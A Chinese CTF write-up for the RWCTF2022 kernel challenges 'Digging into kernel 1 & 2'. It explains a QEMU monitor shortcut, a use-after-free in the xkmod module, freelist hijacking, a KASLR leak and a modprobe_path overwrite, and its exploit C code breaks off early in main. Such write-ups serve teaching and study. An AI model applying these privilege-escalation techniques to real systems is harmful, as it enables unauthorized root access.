<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>RWCTF2022高校赛 - Digging into kernel 1 &amp; 2 | X1NRI</title>
  <meta name="author" content="X1NRI">
  
  <meta name="description" content="kpwn题集">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="RWCTF2022高校赛 - Digging into kernel 1 &amp; 2"/>
  <meta property="og:site_name" content="X1NRI"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="X1NRI" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">X1NRI</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/links" title="Subscribe me.">
			  <i class="fa fa-chain"></i>Links
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> RWCTF2022高校赛 - Digging into kernel 1 &amp; 2</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> kpwn题集
		 </div> <!-- alert -->
	  		

	  <h1 id="Digging-into-kernel"><a href="#Digging-into-kernel" class="headerlink" title="Digging into kernel"></a>Digging into kernel</h1><p>启动脚本：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">qemu-system-x86_64 <span class="token punctuation">\</span>
    <span class="token parameter variable">-kernel</span> bzImage <span class="token punctuation">\</span>
    <span class="token parameter variable">-initrd</span> rootfs.cpio <span class="token punctuation">\</span>
    <span class="token parameter variable">-append</span> <span class="token string">"console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet kalsr"</span> <span class="token punctuation">\</span>
    <span class="token parameter variable">-cpu</span> kvm64,+smep,+smap <span class="token punctuation">\</span>
    <span class="token parameter variable">--nographic</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>本题启动脚本中没有把 monitor 设置为 null，题目可以直接不用看了，先按 <code>ctrl + A</code> 然后按 <code>C</code> 然后 enter 就能进入 qemu 的 monitor 模式直接拿 flag</p>
<h1 id="Digging-into-kernel-2"><a href="#Digging-into-kernel-2" class="headerlink" title="Digging into kernel 2"></a>Digging into kernel 2</h1><p>这一题和上一题其实完全一样，只是修复了启动脚本中 monitor 的漏洞</p>
<h2 id="一、逆向分析"><a href="#一、逆向分析" class="headerlink" title="一、逆向分析"></a>一、逆向分析</h2><h3 id="run-sh"><a href="#run-sh" class="headerlink" title="run.sh"></a>run.sh</h3><p>（出题人把kaslr写成kalsr，我还说调试的时候为啥关不掉，淦）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">qemu-system-x86_64 <span class="token punctuation">\</span>
	<span class="token parameter variable">-kernel</span> bzImage <span class="token punctuation">\</span>
	<span class="token parameter variable">-initrd</span> rootfs.cpio <span class="token punctuation">\</span>
	<span class="token parameter variable">-append</span> <span class="token string">"console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet kaslr"</span> <span class="token punctuation">\</span>
	<span class="token parameter variable">-cpu</span> kvm64,+smep,+smap <span class="token punctuation">\</span>
	<span class="token parameter variable">-monitor</span> null <span class="token punctuation">\</span>
	<span class="token parameter variable">--nographic</span> <span class="token punctuation">\</span>
    <span class="token parameter variable">-s</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>开了kaslr、smep、smap</p>
<p>经过实验也开了kpti</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">/home $ <span class="token function">cat</span> /sys/devices/system/cpu/vulnerabilities/meltdown                       │
Mitigation: PTI  <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="rcS"><a href="#rcS" class="headerlink" title="rcS"></a>rcS</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/sh</span>

<span class="token function">chown</span> <span class="token parameter variable">-R</span> <span class="token number">0</span>:0 /

<span class="token function">mount</span> <span class="token parameter variable">-t</span> proc none /proc
<span class="token function">mount</span> <span class="token parameter variable">-t</span> sysfs none /sys
<span class="token function">mount</span> <span class="token parameter variable">-t</span> devtmpfs none /dev

<span class="token builtin class-name">echo</span> <span class="token number">1</span> <span class="token operator">></span> /proc/sys/kernel/dmesg_restrict
<span class="token builtin class-name">echo</span> <span class="token number">1</span> <span class="token operator">></span> /proc/sys/kernel/kptr_restrict

insmod /xkmod.ko
<span class="token function">chmod</span> <span class="token number">644</span> /dev/xkmod

<span class="token function">chmod</span> <span class="token number">600</span> /flag
<span class="token function">chmod</span> <span class="token number">600</span> /etc/init.d/rcS

<span class="token function">mkdir</span> home <span class="token operator">&amp;&amp;</span> <span class="token builtin class-name">cd</span> home
<span class="token function">chown</span> <span class="token parameter variable">-R</span> <span class="token number">1000</span>:1000 <span class="token builtin class-name">.</span>

<span class="token builtin class-name">echo</span> <span class="token string">"-------------------------------------------"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"|                                         |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"| |~~\|  |  | /~~~~|~~|~~  /~\ /~~\/~\/|  |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"| |__/|  |  ||     |  |--   ,/|    |,/ |  |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"| |__/|  |  ||     |  |--   ,/|    |,/ |  |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"| |  \ \/ \/  \__  |  |    /__ \__//___|_ |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"|                                         |"</span>
<span class="token builtin class-name">echo</span> <span class="token string">"-------------------------------------------"</span>

<span class="token comment">#poweroff -d 120 -f &amp;</span>
setsid cttyhack setuidgid <span class="token number">1000</span> <span class="token function">sh</span>

poweroff <span class="token parameter variable">-f</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="xkmod-ko"><a href="#xkmod-ko" class="headerlink" title="xkmod.ko"></a>xkmod.ko</h3><pre class="line-numbers language-text" data-language="text"><code class="language-text">RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
No RELRO        Canary found      NX disabled   REL             No RPATH   No RUNPATH   60) Symbols	  No	0		0		./rootfs/xkmod.ko<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>开了canary</p>
<p>创建了一个混杂设备“xkmod”<br><img src="/EXP_FILE/a2edc15f46848921d4fcf5f07e8a8272_MD5.jpeg"></p>
<p>在模块载入时会创建一个名为“lalala”的cache，object是0xc0，后面三参都为0，由于没有设置 SLAB_ACCOUNT 标志位故该 kmem_cache 会默认与 kmalloc-192 合并</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __cdecl <span class="token function">xkmod_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  kmem_cache <span class="token operator">*</span>v0<span class="token punctuation">;</span> <span class="token comment">// rax</span>

  <span class="token function">printk</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>unk_1E4<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">misc_register</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>xkmod_device<span class="token punctuation">)</span><span class="token punctuation">;</span>
  v0 <span class="token operator">=</span> <span class="token punctuation">(</span>kmem_cache <span class="token operator">*</span><span class="token punctuation">)</span><span class="token function">kmem_cache_create</span><span class="token punctuation">(</span><span class="token string">"lalala"</span><span class="token punctuation">,</span> <span class="token number">192LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  buf <span class="token operator">=</span> <span class="token number">0LL</span><span class="token punctuation">;</span>
  s <span class="token operator">=</span> v0<span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>ioctl实现了分配、编辑、读取的功能，并且全都没有上锁</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">void</span> __fastcall <span class="token function">xkmod_ioctl</span><span class="token punctuation">(</span>__int64 a1<span class="token punctuation">,</span> <span class="token keyword">int</span> a2<span class="token punctuation">,</span> __int64 a3<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  __int64 v3<span class="token punctuation">;</span> <span class="token comment">// [rsp+0h] [rbp-20h] BYREF</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">int</span> v4<span class="token punctuation">;</span> <span class="token comment">// [rsp+8h] [rbp-18h]</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">int</span> v5<span class="token punctuation">;</span> <span class="token comment">// [rsp+Ch] [rbp-14h]</span>
  <span class="token keyword">unsigned</span> __int64 v6<span class="token punctuation">;</span> <span class="token comment">// [rsp+10h] [rbp-10h]</span>

  v6 <span class="token operator">=</span> <span class="token function">__readgsqword</span><span class="token punctuation">(</span><span class="token number">0x28u</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> a3 <span class="token punctuation">)</span>
  <span class="token punctuation">&#123;</span>
    <span class="token function">copy_from_user</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>v3<span class="token punctuation">,</span> a3<span class="token punctuation">,</span> <span class="token number">16LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span> a2 <span class="token operator">==</span> <span class="token number">0x6666666</span> <span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span> buf <span class="token operator">&amp;&amp;</span> v5 <span class="token operator">&lt;=</span> <span class="token number">0x50</span> <span class="token operator">&amp;&amp;</span> v4 <span class="token operator">&lt;=</span> <span class="token number">0x70</span> <span class="token punctuation">)</span>
      <span class="token punctuation">&#123;</span>
        <span class="token function">copy_from_user</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>v4<span class="token punctuation">,</span> v3<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>v5<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">// set</span>
        <span class="token keyword">return</span><span class="token punctuation">;</span>
      <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">else</span>
    <span class="token punctuation">&#123;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span> a2 <span class="token operator">!=</span> <span class="token number">0x7777777</span> <span class="token punctuation">)</span>
      <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span> a2 <span class="token operator">==</span> <span class="token number">0x1111111</span> <span class="token punctuation">)</span>
          buf <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">void</span> <span class="token operator">*</span><span class="token punctuation">)</span><span class="token function">kmem_cache_alloc</span><span class="token punctuation">(</span>s<span class="token punctuation">,</span> <span class="token number">3264LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">// add</span>
        <span class="token keyword">return</span><span class="token punctuation">;</span>
      <span class="token punctuation">&#125;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span> buf <span class="token operator">&amp;&amp;</span> v5 <span class="token operator">&lt;=</span> <span class="token number">0x50</span> <span class="token operator">&amp;&amp;</span> v4 <span class="token operator">&lt;=</span> <span class="token number">0x70</span> <span class="token punctuation">)</span>
      <span class="token punctuation">&#123;</span>
        <span class="token function">copy_to_user</span><span class="token punctuation">(</span>v3<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span>v4<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">// get</span>
        <span class="token keyword">return</span><span class="token punctuation">;</span>
      <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token function">xkmod_ioctl_cold</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>通过分析，传入的结构体应为：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">struct</span> <span class="token class-name">request_t</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">char</span> <span class="token operator">*</span>data<span class="token punctuation">;</span>
	<span class="token keyword">unsigned</span> <span class="token keyword">int</span> offset<span class="token punctuation">;</span>
	<span class="token keyword">unsigned</span> <span class="token keyword">int</span> size<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<p>在关闭设备时会释放掉buf，但没有置空，存在cache的UAF</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __fastcall <span class="token function">xkmod_release</span><span class="token punctuation">(</span>inode <span class="token operator">*</span>inode<span class="token punctuation">,</span> file <span class="token operator">*</span>file<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token keyword">return</span> <span class="token function">kmem_cache_free</span><span class="token punctuation">(</span>s<span class="token punctuation">,</span> buf<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="二、利用思路"><a href="#二、利用思路" class="headerlink" title="二、利用思路"></a>二、利用思路</h2><p>同时打开两个设备就能实现UAF，甚至不需要ioctl未上锁的漏洞</p>
<ol>
<li>实现内核任意地址写<br>freelist 随机化保护并非是一个运行时保护，而是在为 slub 分配页面时会将页面内的 object 指针随机打乱，<strong>但是在后面的分配释放中依然遵循着LIFO的原则</strong>。</li>
</ol>
<p>我们可以先获得一个 object 的 UAF，修改其 next 为我们想要分配的地址，之后我们连续进行两次分配便能够成功获得目标地址上的 object ，实现任意地址读写。</p>
<p>不过需要注意的是，当我们分配到目标地址时<strong>目标地址前 8 字节的数据会被写入 freelist，而这通常并非一个有效的地址</strong>，从而导致 kernel panic。我们应当尽量选取目标地址往前的一个有着 8 字节 0 的区域，从而使得 freelist 获得一个 NULL 指针，促使 kmem_cache 向 buddy system 请求一个新的 slub，这样就不会发生 crash。</p>
<ol start="2">
<li>泄露内核基址<br>接下来我们考虑如何泄露内核基址，在内核“堆基址”（page_offset_base） + 0x9d000 处存放着 <code>secondary_startup_64</code> 函数的地址。我们可以从 free object 的 next 指针获得一个堆上地址，从而去猜测堆的基址，之后分配到一个 <code>堆基址 + 0x9d000</code> 处的 object 以泄露内核基址<br><img src="/EXP_FILE/c4f5ab23f1217b0d487747a84e7241b1_MD5.jpeg"></li>
</ol>
<p>通过调试，开启kaslr后，page_fault_base由<code>0xffff888000000000 -&gt; 0xffffa2f540000000</code>，我们截取前9位</p>
<ol start="3">
<li>劫持内核执行流<br>我选择覆写 <code>modprobe_path</code> 从而以 root 执行getflag程序</li>
</ol>
<h2 id="三、EXP"><a href="#三、EXP" class="headerlink" title="三、EXP"></a>三、EXP</h2><h3 id="EXP-modprobe-path"><a href="#EXP-modprobe-path" class="headerlink" title="EXP-modprobe_path"></a>EXP-modprobe_path</h3><pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">_GNU_SOURCE</span> </span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;string.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/types.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/stat.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;fcntl.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/ioctl.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sched.h></span></span>

<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">CMD_GET</span> <span class="token expression"><span class="token number">0x7777777</span></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">CMD_SET</span> <span class="token expression"><span class="token number">0x6666666</span></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">CMD_ADD</span> <span class="token expression"><span class="token number">0x1111111</span></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">MODPROBE_PATH</span> <span class="token expression"><span class="token punctuation">(</span><span class="token number">0xffffffff82444700</span><span class="token operator">+</span>koff<span class="token punctuation">)</span></span></span>

<span class="token comment">/*
user_cs;
user_rflags;
user_sp;
user_ss;
*/</span>
<span class="token keyword">struct</span> <span class="token class-name">request_t</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">char</span> <span class="token operator">*</span>data<span class="token punctuation">;</span>
	<span class="token keyword">unsigned</span> <span class="token keyword">int</span> offset<span class="token punctuation">;</span>
	<span class="token keyword">unsigned</span> <span class="token keyword">int</span> size<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>req<span class="token punctuation">;</span>

<span class="token class-name">size_t</span> user_cs<span class="token punctuation">,</span>user_ss<span class="token punctuation">,</span>user_rsp<span class="token punctuation">,</span>user_rflags<span class="token punctuation">;</span>
<span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">saveStatus</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">asm</span> <span class="token keyword">volatile</span><span class="token punctuation">(</span>
		<span class="token string">"mov %0,cs;"</span>
		<span class="token string">"mov %1,ss;"</span>
		<span class="token string">"mov %2,rsp;"</span>
		<span class="token string">"pushf;"</span>		
		<span class="token string">"pop %3;"</span>	    
		<span class="token operator">:</span> <span class="token string">"=r"</span><span class="token punctuation">(</span>user_cs<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"=r"</span><span class="token punctuation">(</span>user_ss<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"=r"</span><span class="token punctuation">(</span>user_rsp<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"=r"</span><span class="token punctuation">(</span>user_rflags<span class="token punctuation">)</span> 
		<span class="token operator">:</span>			
	<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[*] Success to saveStatus!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span> msg<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\033[1;31m[x] Error: %s\033[0m\n"</span><span class="token punctuation">,</span> msg<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">exit</span><span class="token punctuation">(</span>EXIT_FAILURE<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">/* to run the exp on the specific core only */</span>
<span class="token keyword">void</span> <span class="token function">bindCore</span><span class="token punctuation">(</span><span class="token keyword">int</span> core<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token class-name">cpu_set_t</span> cpu_set<span class="token punctuation">;</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[*] set cpu affinity"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">CPU_ZERO</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">CPU_SET</span><span class="token punctuation">(</span>core<span class="token punctuation">,</span> <span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">sched_setaffinity</span><span class="token punctuation">(</span><span class="token function">getpid</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">getRootShell</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">getuid</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"\033[1;31;37m[*] &lt;Successfully Get Root Privileges>\033[0m"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">else</span><span class="token punctuation">&#123;</span>
		<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"\033[1;31m[-] &lt;Get Root Error>\033[0m"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>


<span class="token keyword">void</span> <span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">int</span> r <span class="token operator">=</span> <span class="token function">ioctl</span><span class="token punctuation">(</span>fd<span class="token punctuation">,</span> CMD_ADD<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>r<span class="token operator">&lt;</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"add"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">void</span> <span class="token function">set</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>data<span class="token punctuation">,</span> <span class="token class-name">size_t</span> offset<span class="token punctuation">,</span> <span class="token class-name">size_t</span> size<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	req<span class="token punctuation">.</span>data <span class="token operator">=</span> data<span class="token punctuation">;</span>
	req<span class="token punctuation">.</span>offset <span class="token operator">=</span> offset<span class="token punctuation">;</span>
	req<span class="token punctuation">.</span>size <span class="token operator">=</span> size<span class="token punctuation">;</span>

	<span class="token keyword">int</span> r <span class="token operator">=</span> <span class="token function">ioctl</span><span class="token punctuation">(</span>fd<span class="token punctuation">,</span> CMD_SET<span class="token punctuation">,</span> <span class="token operator">&amp;</span>req<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>r<span class="token operator">&lt;</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"set"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">void</span> <span class="token function">get</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>data<span class="token punctuation">,</span> <span class="token class-name">size_t</span> offset<span class="token punctuation">,</span> <span class="token class-name">size_t</span> size<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	req<span class="token punctuation">.</span>data <span class="token operator">=</span> data<span class="token punctuation">;</span>
	req<span class="token punctuation">.</span>offset <span class="token operator">=</span> offset<span class="token punctuation">;</span>
	req<span class="token punctuation">.</span>size <span class="token operator">=</span> size<span class="token punctuation">;</span>

	<span class="token keyword">int</span> r <span class="token operator">=</span> <span class="token function">ioctl</span><span class="token punctuation">(</span>fd<span class="token punctuation">,</span> CMD_GET<span class="token punctuation">,</span> <span class="token operator">&amp;</span>req<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>r<span class="token operator">&lt;</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"get"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">char</span> <span class="token operator">*</span>buf<span class="token punctuation">;</span>
<span class="token class-name">size_t</span> leak<span class="token punctuation">;</span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span> <span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>argv<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>envp<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token function">saveStatus</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">bindCore</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment">/* UAF1 */</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[*] ------UAF1------"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
